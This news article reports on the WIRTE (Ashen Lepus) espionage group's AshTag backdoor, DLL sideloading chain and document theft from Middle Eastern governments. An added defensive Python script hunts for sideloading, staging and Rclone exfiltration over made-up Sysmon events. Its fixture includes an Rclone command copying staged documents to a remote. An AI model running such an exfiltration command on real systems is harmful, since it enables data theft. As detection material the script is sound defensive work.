WIRTE Leverages AshenLoader Sideloading to Install the AshTag Espionage Backdoor

By Team-CWD, December 20, 2025

An advanced persistent threat (APT) known as WIRTE has been attributed to attacks, dating back to 2020, that target government and diplomatic entities across the Middle East with a previously undocumented malware suite dubbed AshTag.

Palo Alto Networks Unit 42 is tracking the activity cluster under the name Ashen Lepus. Artifacts uploaded to the VirusTotal platform show that the threat actor has trained its sights on Oman and Morocco, indicating an expansion in operational scope beyond the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt.

The company told The Hacker News it has observed “scores of unique lures” disseminated across the Middle East, indicating a “persistent and wide-reaching campaign” confined to government and diplomatic entities in the region. More than a dozen entities are estimated to have been targeted, although the real number is suspected to be higher.

“Ashen Lepus remained persistently active throughout the Israel-Hamas conflict, distinguishing it from other affiliated groups whose activities decreased over the same period,” the cybersecurity company said in a report shared with The Hacker News. “Ashen Lepus continued with its campaign even after the October 2025 Gaza ceasefire, deploying newly developed malware variants and engaging in hands-on activity within victim environments.”

WIRTE, which overlaps with an Arabic-speaking, politically motivated cluster known as Gaza Cyber Gang (aka Blackstem, Extreme Jackal, Molerats, or TA402), is assessed to have been active since at least 2018. According to a report from Cybereason, Molerats and APT-C-23 (aka Arid Viper, Desert Varnish, or Renegade Jackal) are the two main sub-groups of the Hamas cyberwarfare division.

It’s primarily driven by espionage and intelligence collection, targeting government entities in the Middle East to meet its strategic objectives.

“Specifically, the connection between WIRTE (Ashen Lepus) and the broader Gaza Cyber Gang is primarily evidenced by code overlaps and similarities,” Unit 42 researchers said. “This suggests that while they operate independently, the tools were developed by close entities and they likely share development resources. We have also seen overlap in other groups’ victimology.”

In a report published in November 2024, Check Point attributed to the hacking crew a series of destructive attacks aimed exclusively at Israeli entities, infecting them with a custom wiper malware referred to as SameCoin, which highlights the group’s ability to carry out both espionage and sabotage.

The long-running, elusive campaign detailed by Unit 42, going all the way back to 2018, has been found to leverage phishing emails with lures related to geopolitical affairs in the region. A recent increase in lures related to Turkey – e.g., “Partnership agreement between Morocco and Turkey” or “Draft resolutions concerning the State of Palestine” – suggests that entities in the country may be a new area of focus.

The attack chains commence with a benign PDF decoy that tricks recipients into downloading a RAR archive from a file-sharing service. Opening the archive triggers a chain of events that results in the deployment of AshTag.

The archive carries a renamed benign binary that sideloads a malicious DLL dubbed AshenLoader. In addition to opening a decoy PDF file to keep up the ruse, AshenLoader contacts an external server to retrieve two more components: a legitimate executable and a DLL payload called AshenStager (aka stagerx64). AshenStager is again sideloaded by the legitimate executable and launches the malware suite in memory, minimizing forensic artifacts on disk.

AshTag is a modular .NET backdoor designed to provide persistence and remote command execution while masquerading as a legitimate VisualServer utility to fly under the radar. Internally, its features are realized through a component called AshenOrchestrator, which handles communications with the operators and runs additional payloads in memory.

These payloads serve different purposes –

  • Persistence and process management
  • Update and removal
  • Screen capture
  • File explorer and management
  • System fingerprinting

In one case, Unit 42 said it observed the threat actor accessing a compromised machine to conduct hands-on data theft, staging documents of interest in the C:\Users\Public folder. These files are said to have been pulled from the victim’s email inbox, the end goal being the theft of diplomacy-related documents. The documents were then exfiltrated to an attacker-controlled server using the Rclone utility.
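The sideloading chain described above (a renamed legitimate executable loading an unsigned DLL from the same user-writable directory) and the hands-on staging in C:\Users\Public followed by Rclone exfiltration both leave telemetry that a defender can hunt on. The following is an added example written for this page, not tooling from Unit 42 or the original article. It runs three hunt rules over constructed Sysmon-style events (process create, image load, file create); the field names follow Sysmon’s schema, but every path, file name, ProcessGuid and command line is made up for illustration, and the list of user-writable directories is an assumption you should adapt to your estate.

```python
"""Hunt rules for the sideload -> staging -> Rclone pattern, over constructed
Sysmon-style events.  Added example; not Unit 42 code, not real victim data."""
import ntpath
import re

# Assumption: paths under these prefixes are writable by a standard user.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\", "c:\\windows\\temp\\")
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".msg", ".eml"}
# Rclone verbs followed by a source and a "remote:" destination.
RCLONE_VERB = re.compile(r"\b(copy|copyto|sync|move)\s+\S+\s+[A-Za-z0-9_-]+:", re.I)


def is_user_writable(path):
    return path.lower().startswith(USER_WRITABLE)


def rule_sideload(ev, procs):
    """Sysmon EID 7: unsigned DLL loaded from the same user-writable directory
    as the host EXE.  If EID 1 shows the EXE's OriginalFileName differs from
    its on-disk name, the host is a renamed binary (as in the AshenLoader chain)."""
    if ev["EventID"] != 7 or ev.get("Signed") != "false":
        return None
    exe, dll = ev["Image"], ev["ImageLoaded"]
    if ntpath.dirname(exe).lower() != ntpath.dirname(dll).lower():
        return None
    if not is_user_writable(dll):
        return None
    proc = procs.get(ev["ProcessGuid"], {})
    orig = proc.get("OriginalFileName", "").lower()
    renamed = orig not in ("", ntpath.basename(exe).lower())
    return (f"unsigned {ntpath.basename(dll)} loaded by "
            f"{'renamed ' if renamed else ''}{ntpath.basename(exe)} from {ntpath.dirname(dll)}")


def rule_staging(ev):
    """Sysmon EID 11: document-type file created under C:\\Users\\Public."""
    if ev["EventID"] != 11:
        return None
    target = ev["TargetFilename"]
    if not target.lower().startswith("c:\\users\\public\\"):
        return None
    if ntpath.splitext(target)[1].lower() not in DOC_EXT:
        return None
    return f"document staged in C:\\Users\\Public by {ntpath.basename(ev['Image'])}: {ntpath.basename(target)}"


def rule_rclone(ev):
    """Sysmon EID 1: a process that is rclone (by OriginalFileName or image name,
    so renaming rclone.exe does not evade it) pushing data to a remote."""
    if ev["EventID"] != 1:
        return None
    looks_like_rclone = (ev.get("OriginalFileName", "").lower() == "rclone.exe"
                         or "rclone" in ntpath.basename(ev["Image"]).lower())
    cmd = ev.get("CommandLine", "")
    if looks_like_rclone and RCLONE_VERB.search(cmd):
        return f"rclone transfer to remote: {cmd}"
    return None


def hunt(events):
    """Return (rule_name, detail) for every event that trips a rule."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    rules = (("sideload", lambda e: rule_sideload(e, procs)),
             ("staging", rule_staging),
             ("rclone_exfil", rule_rclone))
    hits = []
    for ev in events:
        for name, rule in rules:
            detail = rule(ev)
            if detail:
                hits.append((name, detail))
    return hits


# Constructed sample telemetry (every value is made up for the example).
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Users\victim\Downloads\Brief\VisualServer.exe",
     "OriginalFileName": "LegitHost.exe", "CommandLine": "VisualServer.exe"},
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": r"C:\Users\victim\Downloads\Brief\VisualServer.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\Brief\support.dll", "Signed": "false"},
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": r"C:\Users\victim\Downloads\Brief\VisualServer.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "CommandLine": "notepad.exe"},
    {"EventID": 11, "ProcessGuid": "{A1}", "Image": r"C:\Users\victim\Downloads\Brief\VisualServer.exe",
     "TargetFilename": r"C:\Users\Public\draft_resolution.docx"},
    {"EventID": 11, "ProcessGuid": "{B2}", "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\victim\Documents\notes.txt"},
    {"EventID": 1, "ProcessGuid": "{C3}", "Image": r"C:\Users\Public\rc.exe",
     "OriginalFileName": "rclone.exe",
     "CommandLine": r"rc.exe copy C:\Users\Public remote:drop --config C:\Users\Public\rc.conf"},
]

if __name__ == "__main__":
    for name, detail in hunt(EVENTS):
        print(f"[{name}] {detail}")
```

The sideload rule deliberately joins the image-load event to the process-create event: Sysmon’s EID 7 only tells you whether the loaded DLL is signed, so the “renamed benign binary” signal has to come from EID 1’s OriginalFileName. The Rclone rule keys on OriginalFileName and the command-line shape rather than the file name alone, because an actor who stages in C:\Users\Public will just as readily rename rclone.exe.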

It’s assessed that data theft has likely occurred across the broader victim population, particularly in environments where advanced detection capabilities are absent.

“Ashen Lepus remains a persistent espionage actor, demonstrating a clear intent to continue its operations throughout the recent regional conflict — unlike other affiliated threat groups, whose activity significantly decreased,” the company concluded. “The threat actors’ activities throughout the last two years in particular highlight their commitment to constant intelligence collection.”
